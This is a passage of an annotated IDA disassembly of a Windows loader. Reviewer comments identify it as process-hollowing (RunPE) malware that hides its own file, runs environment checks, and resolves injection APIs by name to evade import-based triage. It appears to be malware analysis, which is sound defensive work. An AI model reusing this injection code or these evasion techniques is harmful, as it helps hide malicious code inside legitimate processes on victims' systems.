111h ; Msg push esi ; hWnd call ds:SendMessageA ; SendMessageA mov edi, ds:IsWindow jmp short loc_401A81 ; --------------------------------------------------------------------------- loc_401A7D: ; CODE XREF: StartAddress+4Cj push 32h ; dwMilliseconds call ebp ; Sleep loc_401A81: ; CODE XREF: StartAddress+41j push esi ; hWnd call edi ; IsWindow test eax, eax jnz short loc_401A7D pop edi pop esi pop ebp pop ebx retn 4 StartAddress endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame ; int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) _WinMain@16 proc near ; CODE XREF: start+186p Context = CONTEXT ptr -528h flOldProtect = dword ptr -25Ch FileName = byte ptr -17Ch var_7C = dword ptr -7Ch ProcessInformation= _PROCESS_INFORMATION ptr -3Ch var_2C = dword ptr -2Ch lpAddress = dword ptr -14h dwSize = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 hInstance = dword ptr 8 hPrevInstance = dword ptr 0Ch lpCmdLine = dword ptr 10h nShowCmd = dword ptr 14h push ebp mov ebp, esp sub esp, 528h push ebx push esi push edi push 100h ; nSize lea eax, [ebp+FileName] push eax ; lpFilename xor ebx, ebx push ebx ; hModule call ds:GetModuleFileNameA ; GetModuleFileNameA push ebx ; lpThreadId push ebx ; dwCreationFlags push ebx ; lpParameter push offset StartAddress ; lpStartAddress push ebx ; dwStackSize push ebx ; lpThreadAttributes call ds:CreateThread ; CreateThread lea eax, [ebp+FileName] push eax ; lpFileName push ebx ; int call sub_401881 pop ecx pop ecx call sub_40196F test al, al jnz loc_401C4E call sub_4019CA test eax, eax jnz loc_401C4E call sub_4019FA test al, al jnz loc_401C4E push 6 ; dwFileAttributes lea eax, [ebp+FileName] push eax ; lpFileName call ds:SetFileAttributesA ; SetFileAttributesA mov esi, ds:GetModuleHandleA push offset aVirtualalloc ; "VirtualAlloc" push offset ModuleName ; "kernel32.dll" call esi ; GetModuleHandleA mov edi, 
ds:GetProcAddress push eax ; hModule call edi ; GetProcAddress mov [ebp+var_4], eax lea eax, [ebp+var_C] push eax lea eax, [ebp+flOldProtect] push eax lea eax, [ebp+var_2C] push eax lea eax, [ebp+var_7C] push ebx push eax call sub_4011C8 add esp, 14h test al, al jz loc_401C43 push [ebp+var_C] lea eax, [ebp+flOldProtect] push eax lea eax, [ebp+var_2C] push eax lea eax, [ebp+var_7C] push eax call sub_4013B0 add esp, 10h push 40h push 1000h push eax push ebx mov [ebp+var_8], eax call [ebp+var_4] push eax ; Dst push [ebp+var_C] ; int mov dword_4362B0, eax lea eax, [ebp+flOldProtect] push eax ; Size push ebx ; int lea eax, [ebp+var_2C] push eax ; int lea eax, [ebp+var_7C] push eax ; int call sub_401425 push ebx lea eax, [ebp+lpAddress] push eax ; int lea eax, [ebp+Context] push eax ; lpContext push ebx ; int lea eax, [ebp+ProcessInformation] push eax ; lpProcessInformation lea eax, [ebp+FileName] push eax ; lpCommandLine call sub_401613 add esp, 30h push offset aWriteprocessme ; "WriteProcessMemory" push offset ModuleName ; "kernel32.dll" call esi ; GetModuleHandleA push eax ; hModule call edi ; GetProcAddress push [ebp+dwSize] ; dwSize mov [ebp+var_4], eax push [ebp+lpAddress] ; lpAddress mov ecx, 0B3h sub esp, 2CCh mov edi, esp sub esp, 10h lea esi, [ebp+Context] rep movsd mov edi, esp lea eax, [ebp+FileName] push eax ; int push [ebp+var_8] ; int lea esi, [ebp+ProcessInformation] push dword_4362B0 ; int movsd push [ebp+var_C] ; int movsd lea eax, [ebp+flOldProtect] push eax ; flOldProtect push ebx ; int lea eax, [ebp+var_2C] movsd push eax ; int lea eax, [ebp+var_7C] push eax ; int movsd call sub_4016EE add esp, 304h push ebx push [ebp+var_8] push dword_4362B0 push dword_4362C0 push dword_4362B4 call [ebp+var_4] test eax, eax setnz al mov byte_4362B8, al push [ebp+var_8] push ebx call sub_401855 pop ecx pop ecx loc_401C43: ; CODE XREF: WinMain(x,x,x,x)+B2j push 0BB8h ; dwMilliseconds call ds:Sleep ; Sleep loc_401C4E: ; CODE XREF: WinMain(x,x,x,x)+47j ; 
WinMain(x,x,x,x)+54j ... pop edi pop esi xor eax, eax pop ebx leave retn 10h _WinMain@16 endp ; [00000046 BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND] ; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND] ; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND] align 10h ; [0000008B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND] align 10h ; [00000060 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND] ; [0000000E BYTES: COLLAPSED FUNCTION operator new(uint). PRESS KEYPAD "+" TO EXPAND] align 10h ; [0000033D BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND] ; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND] pop ecx pop ecx retn ; [000001DC BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND] ; [0000001A BYTES: COLLAPSED FUNCTION ___heap_select. PRESS KEYPAD "+" TO EXPAND] ; [00000051 BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD "+" TO EXPAND] ; [00000048 BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND] ; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND] ; [00000318 BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND] ; [000000B7 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND] ; [00000106 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND] ; [000002DF BYTES: COLLAPSED FUNCTION ___sbh_resize_block. PRESS KEYPAD "+" TO EXPAND] ; [000002FC BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND] ; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND] ; [0000002F BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND] db 0CCh ; [0000006A BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND] ; [000000C1 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND] ; [00000011 BYTES: COLLAPSED FUNCTION _exit. 
PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __cexit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __c_exit. PRESS KEYPAD "+" TO EXPAND]
; [00000177 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; [00000171 BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; [0000005D BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000C7 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [0000016C BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [000000A2 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [00000122 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
; [000001AB BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame

; Walk a table of function pointers and call every non-NULL entry, each
; call wrapped in an SEH __try whose scope table is stru_406858.  Reached
; from the CRT entry point (start).  No arguments, no return value; eax is
; clobbered (what the called entries clobber is not visible here).
;
; NOTE(review): as listed, the cursor is initialised to offset dword_40704C
; and compared against the *same* symbol, so the loop would exit on its
; first compare and never call anything.  In .rdata dword_40704C is two
; zero dwords followed by dword_407054.  This smells like an IDA symbol /
; relocation artefact -- confirm the real start and end bounds against the
; raw bytes before concluding that nothing runs from here.

sub_403982 proc near ; CODE XREF: start:loc_402235p

var_1C = dword ptr -1Ch ; cursor into the function-pointer table
ms_exc = CPPEH_RECORD ptr -18h ; SEH registration record set up by __SEH_prolog

        push    0Ch
        push    offset stru_406858
        call    __SEH_prolog
        mov     [ebp+var_1C], offset dword_40704C ; cursor = table start

loc_403995: ; CODE XREF: sub_403982+3Cj
        cmp     [ebp+var_1C], offset dword_40704C ; cursor >= table end -> done
        jnb     short loc_4039C0
        and     [ebp+ms_exc.disabled], 0 ; trylevel = 0: enter the __try block
        mov     eax, [ebp+var_1C]
        mov     eax, [eax] ; eax = *cursor
        test    eax, eax
        jz      short loc_4039B6 ; NULL entries are skipped
        call    eax ; invoke the table entry (no arguments pushed)
        jmp     short loc_4039B6
; ---------------------------------------------------------------------------

loc_4039AF: ; DATA XREF: .rdata:stru_406858o
; __except filter for the scope above: returns 1 (EXCEPTION_EXECUTE_HANDLER),
; so any exception raised by a table entry is swallowed.
        xor     eax, eax
        inc     eax
        retn
; ---------------------------------------------------------------------------

loc_4039B3: ; DATA XREF: .rdata:stru_406858o
; __except handler body: restore esp saved by __SEH_prolog, then fall into
; the loop tail, i.e. carry on with the next entry after a faulting one.
        mov     esp, [ebp+ms_exc.old_esp]

loc_4039B6: ; CODE XREF: sub_403982+27j
; sub_403982+2Bj
        or      [ebp+ms_exc.disabled], 0FFFFFFFFh ; trylevel = -1: leave the __try block
        add     [ebp+var_1C], 4 ; next pointer
        jmp     short loc_403995
; ---------------------------------------------------------------------------

loc_4039C0: ; CODE XREF: sub_403982+1Aj
        call    __SEH_epilog
        retn
sub_403982 endp

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame

; Same table-walk-with-SEH pattern as sub_403982, but for the table at
; dword_407054 and scope table stru_406868; referenced from __cinit.
; NOTE(review): identical caveat -- start and end bound are both shown as
; offset dword_407054 (listed in .rdata as a single zero dword), so as
; displayed the loop body is never entered; verify against the raw bytes.

; void __cdecl sub_4039C6()
sub_4039C6 proc near ; DATA XREF: __cinit:loc_402F32o

var_1C = dword ptr -1Ch ; cursor into the function-pointer table
ms_exc = CPPEH_RECORD ptr -18h ; SEH registration record set up by __SEH_prolog

        push    0Ch
        push    offset stru_406868
        call    __SEH_prolog
        mov     [ebp+var_1C], offset dword_407054 ; cursor = table start

loc_4039D9: ; CODE XREF: sub_4039C6+3Cj
        cmp     [ebp+var_1C], offset dword_407054 ; cursor >= table end -> done
        jnb     short loc_403A04
        and     [ebp+ms_exc.disabled], 0 ; enter the __try block
        mov     eax, [ebp+var_1C]
        mov     eax, [eax] ; eax = *cursor
        test    eax, eax
        jz      short loc_4039FA ; NULL entries are skipped
        call    eax
        jmp     short loc_4039FA
; ---------------------------------------------------------------------------

loc_4039F3: ; DATA XREF: .rdata:stru_406868o
; __except filter: always EXCEPTION_EXECUTE_HANDLER (1).
        xor     eax, eax
        inc     eax
        retn
; ---------------------------------------------------------------------------

loc_4039F7: ; DATA XREF: .rdata:stru_406868o
; __except handler body: restore esp and continue with the next entry.
        mov     esp, [ebp+ms_exc.old_esp]

loc_4039FA: ; CODE XREF: sub_4039C6+27j
; sub_4039C6+2Bj
        or      [ebp+ms_exc.disabled], 0FFFFFFFFh ; leave the __try block
        add     [ebp+var_1C], 4 ; next pointer
        jmp     short loc_4039D9
; ---------------------------------------------------------------------------

loc_403A04: ; CODE XREF: sub_4039C6+1Aj
        call    __SEH_epilog
        retn
sub_4039C6 endp

; ---------------------------------------------------------------------------
align 4
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; NOTE(review): the six "instructions" below belong to no function and carry
; no XREF.  Their opcode bytes are 56 43 32 30 58 43 30 30, i.e. the ASCII
; text "VC20XC00" -- the marker the CRT's __ValidateEH3RN looks for next to
; __except_handler3.  Treat them as data that IDA auto-disassembled, not as
; reachable code.
        push    esi
        inc     ebx
        xor     dh, [eax]
        pop     eax
        inc     ebx
        xor     [eax], dh
; [000000E6 BYTES: COLLAPSED FUNCTION __except_handler3. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION _seh_longjmp_unwind(x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003D BYTES: COLLAPSED FUNCTION __alloca_probe.
PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
; [00000082 BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
; [00000028 BYTES: COLLAPSED FUNCTION ___onexitinit. PRESS KEYPAD "+" TO EXPAND]
; [000000F9 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E8 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000124 BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [0000001D BYTES: COLLAPSED CHUNK OF FUNCTION sub_404305. PRESS KEYPAD "+" TO EXPAND]

; =============== S U B R O U T I N E =======================================

; SEH __except filter referenced from scope table stru_4068E8 (the table
; used by sub_404305).  Always returns 1 (EXCEPTION_EXECUTE_HANDLER), so
; every exception in the guarded region is caught.  Same shape as the
; inline filters loc_4039AF / loc_4039F3 in the table walkers above.
sub_4042F1 proc near ; DATA XREF: .rdata:stru_4068E8o
        xor     eax, eax
        inc     eax
        retn
sub_4042F1 endp

; =============== S U B R O U T I N E =======================================

; SEH __except handler body for the same scope table: reloads esp from the
; CPPEH_RECORD at ebp-18h (the ms_exc.old_esp slot saved by __SEH_prolog)
; and falls straight through into the following chunk of sub_404305.  That
; fall-through is why IDA reports "sp-analysis failed" -- this is a handler
; landing pad carved out of sub_404305, not a standalone function.
sub_4042F5 proc near ; DATA XREF: .rdata:stru_4068E8o
        mov     esp, [ebp-18h]
sub_4042F5 endp ; sp-analysis failed
; [0000000C BYTES: COLLAPSED CHUNK OF FUNCTION sub_404305. PRESS KEYPAD "+" TO EXPAND]
db 0CCh
; [0000000E BYTES: COLLAPSED FUNCTION sub_404305. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
; [0000018C BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
; [000001E6 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000001E BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION _free.
PRESS KEYPAD "+" TO EXPAND] align 4 ; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND] ; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND] ; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND] ; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND] ; --------------------------------------------------------------------------- __NLG_Notify1: push ebx push ecx mov ebx, offset dword_408290 jmp short loc_404858 ; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND] ; [00000229 BYTES: COLLAPSED FUNCTION __ValidateEH3RN. PRESS KEYPAD "+" TO EXPAND] ; [00000162 BYTES: COLLAPSED FUNCTION _realloc. PRESS KEYPAD "+" TO EXPAND] ; [00000038 BYTES: COLLAPSED FUNCTION __msize. PRESS KEYPAD "+" TO EXPAND] ; [00000066 BYTES: COLLAPSED FUNCTION ___security_init_cookie. PRESS KEYPAD "+" TO EXPAND] ; [00000147 BYTES: COLLAPSED FUNCTION ___security_error_handler. PRESS KEYPAD "+" TO EXPAND] db 0CCh ; [000003BC BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND] ; [000001BA BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND] ; [00000043 BYTES: COLLAPSED FUNCTION ___ansicp. PRESS KEYPAD "+" TO EXPAND] ; [000001C9 BYTES: COLLAPSED FUNCTION ___convertcp. PRESS KEYPAD "+" TO EXPAND] ; [000000E3 BYTES: COLLAPSED FUNCTION __resetstkoflw. PRESS KEYPAD "+" TO EXPAND] ; [0000007B BYTES: COLLAPSED FUNCTION _calloc. PRESS KEYPAD "+" TO EXPAND] ; [00000058 BYTES: COLLAPSED FUNCTION _atol. PRESS KEYPAD "+" TO EXPAND] ; [00000090 BYTES: COLLAPSED FUNCTION __ismbcspace. 
PRESS KEYPAD "+" TO EXPAND]
align 10h

; CRT helper __allmul: 64-bit multiply, result taken mod 2^64 (so the same
; routine serves signed and unsigned operands).
; Stack arguments on entry (callee pops 10h):
;   [esp+4]   = a.lo    [esp+8]   = a.hi
;   [esp+0Ch] = b.lo    [esp+10h] = b.hi
; Returns edx:eax = a * b.  Clobbers ecx and flags; ebx is preserved
; (pushed/popped on the slow path).
__allmul:
        mov     eax, [esp+8] ; a.hi
        mov     ecx, [esp+10h] ; b.hi
        or      ecx, eax ; ZF set iff both high halves are zero
        mov     ecx, [esp+0Ch] ; b.lo -- mov leaves the flags from 'or' intact
        jnz     short loc_4057B9 ; some high half is non-zero: need cross products
        mov     eax, [esp+4] ; a.lo
        mul     ecx ; edx:eax = a.lo * b.lo (exact: no high bits to fold in)
        retn    10h
; ---------------------------------------------------------------------------

loc_4057B9: ; CODE XREF: .text:004057AEj
; Full path.  After 'push ebx' every argument is 4 bytes further up:
;   [esp+8] = a.lo   [esp+0Ch] = a.hi   [esp+10h] = b.lo   [esp+14h] = b.hi
; eax still holds a.hi and ecx holds b.lo from the prologue above.
        push    ebx
        mul     ecx ; eax = lo32(a.hi * b.lo)
        mov     ebx, eax
        mov     eax, [esp+8] ; a.lo
        mul     dword ptr [esp+14h] ; eax = lo32(a.lo * b.hi)
        add     ebx, eax ; ebx = sum of the two cross products (mod 2^32)
        mov     eax, [esp+8] ; a.lo
        mul     ecx ; edx:eax = a.lo * b.lo
        add     edx, ebx ; fold the cross products into the high dword
        pop     ebx
        retn    10h
; [0000007E BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND]

; =============== S U B R O U T I N E =======================================

; Resolves kernel32!ReadProcessMemory by name at run time and caches the
; pointer in dword_4362C4.  Its address is stored at .data:00408008, in the
; table that starts with ___security_init_cookie at dword_408000 -- so it
; presumably runs as a CRT initialiser before WinMain (confirm against the
; table walk in start/__cinit).
;
; No NULL check on the GetModuleHandleA or GetProcAddress result: on failure
; the global is left 0 and the later indirect call through it would fault.
;
; Analyst note: ReadProcessMemory is also a static import (used by
; sub_4019FA), but the names resolved by sub_405875 / sub_405892 below and
; the WriteProcessMemory lookup in WinMain are NOT in the import table, so
; the name-based lookup keeps them out of import-based triage.  Together
; with the static imports CreateProcessA, GetThreadContext, VirtualAllocEx,
; VirtualProtectEx and ResumeThread this is the API set characteristic of
; process hollowing / RunPE-style injection.
sub_405858 proc near ; DATA XREF: .data:00408008o
        push    offset aReadprocessmem ; "ReadProcessMemory"
        push    offset ModuleName ; "kernel32.dll"
        call    ds:GetModuleHandleA ; GetModuleHandleA
        push    eax ; hModule
        call    ds:GetProcAddress ; GetProcAddress
        mov     dword_4362C4, eax ; cached ReadProcessMemory pointer
        retn
sub_405858 endp

; =============== S U B R O U T I N E =======================================

; Resolves kernel32!SetThreadContext by name and caches it in dword_4362CC.
; Referenced from .data:0040800C (same initialiser table as above); same
; missing NULL checks.  SetThreadContext is not a static import.
sub_405875 proc near ; DATA XREF: .data:0040800Co
        push    offset aSetthreadconte ; "SetThreadContext"
        push    offset ModuleName ; "kernel32.dll"
        call    ds:GetModuleHandleA ; GetModuleHandleA
        push    eax ; hModule
        call    ds:GetProcAddress ; GetProcAddress
        mov     dword_4362CC, eax ; cached SetThreadContext pointer
        retn
sub_405875 endp

; =============== S U B R O U T I N E =======================================

; Resolves ntdll!NtUnmapViewOfSection by name and caches it in dword_4362C8.
; Referenced from .data:00408010.  Uses GetModuleHandleA rather than
; LoadLibraryA (ntdll is always mapped); same missing NULL checks.
; NtUnmapViewOfSection is the call used to hollow out a suspended target
; before a replacement image is written into it -- undocumented and never
; a static import here.
sub_405892 proc near ; DATA XREF: .data:00408010o
        push    offset aNtunmapviewofs ; "NtUnmapViewOfSection"
        push    offset LibFileName ; "ntdll.dll"
        call    ds:GetModuleHandleA ; GetModuleHandleA
        push    eax ; hModule
        call    ds:GetProcAddress ; GetProcAddress
        mov     dword_4362C8, eax ; cached NtUnmapViewOfSection pointer
        retn
sub_405892 endp

; ---------------------------------------------------------------------------
align 200h
_text ends

; Section 2. (virtual address 00006000)
; Virtual size : 00001690 ( 5776.)
; Section size in file : 00001800 ( 6144.)
; Offset to raw data for section: 00004E00 ; Flags 40000040: Data Readable ; Alignment : default ; ; Imports from ADVAPI32.dll ; ; =========================================================================== ; Segment type: Externs ; _idata ; BOOL __stdcall GetUserNameA(LPSTR lpBuffer, LPDWORD pcbBuffer) extrn GetUserNameA:dword ; CODE XREF: sub_40196F+24p ; DATA XREF: sub_40196F+24r ; ; Imports from KERNEL32.dll ; ; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName) extrn LoadLibraryA:dword ; CODE XREF: sub_401000+22p ; ___crtMessageBoxA+18p ; DATA XREF: ... ; SIZE_T __stdcall VirtualQueryEx(HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength) extrn VirtualQueryEx:dword ; CODE XREF: sub_4015FB+11p ; DATA XREF: sub_4015FB+11r ; BOOL __stdcall GetThreadContext(HANDLE hThread, LPCONTEXT lpContext) extrn GetThreadContext:dword ; CODE XREF: sub_401613+46p ; DATA XREF: sub_401613+46r ; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation) extrn CreateProcessA:dword ; CODE XREF: sub_401613+2Ap ; DATA XREF: sub_401613+2Ar ; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName) extrn GetModuleHandleA:dword ; CODE XREF: sub_4016EE+E2p ; sub_4019FA+11p ... ; BOOL __stdcall VirtualProtectEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect) extrn VirtualProtectEx:dword ; CODE XREF: sub_4016EE+3Ap ; DATA XREF: sub_4016EE+3Ar ; LPVOID __stdcall VirtualAllocEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) extrn VirtualAllocEx:dword ; CODE XREF: sub_4016EE+72p ; sub_4016EE+9Ep ; DATA XREF: ... 
; DWORD __stdcall ResumeThread(HANDLE hThread) extrn ResumeThread:dword ; CODE XREF: sub_401855+Dp ; DATA XREF: sub_401855+Dr ; BOOL __stdcall ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped) extrn ReadFile:dword ; CODE XREF: sub_401881+52p ; DATA XREF: sub_401881+52r ; DWORD __stdcall GetFileSize(HANDLE hFile, LPDWORD lpFileSizeHigh) extrn GetFileSize:dword ; CODE XREF: sub_401881+28p ; DATA XREF: sub_401881+28r ; HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile) extrn CreateFileA:dword ; CODE XREF: sub_401881+1Bp ; sub_4019CA+17p ; DATA XREF: ... ; int __stdcall lstrcmpA(LPCSTR lpString1, LPCSTR lpString2) extrn lstrcmpA:dword ; CODE XREF: sub_40196F+3Dp ; sub_40196F+4Cp ; DATA XREF: ... ; BOOL __stdcall CloseHandle(HANDLE hObject) extrn CloseHandle:dword ; CODE XREF: sub_4019CA+23p ; DATA XREF: sub_4019CA+23r ; BOOL __stdcall ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead) extrn ReadProcessMemory:dword ; CODE XREF: sub_4019FA+2Dp ; DATA XREF: sub_4019FA+2Dr ; HANDLE __stdcall GetCurrentProcess() extrn GetCurrentProcess:dword ; CODE XREF: sub_4019FA+26p ; _doexit+13p ; DATA XREF: ... ; void __stdcall Sleep(DWORD dwMilliseconds) extrn Sleep:dword ; CODE XREF: StartAddress+1Ep ; StartAddress+45p ... 
; BOOL __stdcall SetFileAttributesA(LPCSTR lpFileName, DWORD dwFileAttributes) extrn SetFileAttributesA:dword ; CODE XREF: WinMain(x,x,x,x)+70p ; DATA XREF: WinMain(x,x,x,x)+70r ; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId) extrn CreateThread:dword ; CODE XREF: WinMain(x,x,x,x)+2Bp ; DATA XREF: WinMain(x,x,x,x)+2Br ; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize) extrn GetModuleFileNameA:dword ; CODE XREF: WinMain(x,x,x,x)+1Bp ; __NMSG_WRITE+81p ... ; LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes) extrn HeapAlloc:dword ; CODE XREF: __heap_alloc+3Ep ; ___sbh_heap_init+Dp ... ; void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo) extrn GetStartupInfoA:dword ; CODE XREF: start+160p ; __ioinit+57p ; DATA XREF: ... ; LPSTR __stdcall GetCommandLineA() extrn GetCommandLineA:dword ; CODE XREF: start:loc_40224Ep ; DATA XREF: start:loc_40224Er ; BOOL __stdcall GetVersionExA(LPOSVERSIONINFOA lpVersionInformation) extrn GetVersionExA:dword ; CODE XREF: start+20p ; DATA XREF: start+20r ; BOOL __stdcall HeapDestroy(HANDLE hHeap) extrn HeapDestroy:dword ; CODE XREF: __heap_init+44p ; DATA XREF: __heap_init+44r ; HANDLE __stdcall HeapCreate(DWORD flOptions, SIZE_T dwInitialSize, SIZE_T dwMaximumSize) extrn HeapCreate:dword ; CODE XREF: __heap_init+11p ; DATA XREF: __heap_init+11r ; BOOL __stdcall VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType) extrn VirtualFree:dword ; CODE XREF: ___sbh_free_block+247p ; ___sbh_free_block+2A2p ; DATA XREF: ... ; BOOL __stdcall HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem) extrn HeapFree:dword ; CODE XREF: ___sbh_free_block+2B4p ; ___sbh_alloc_new_region+95p ... 
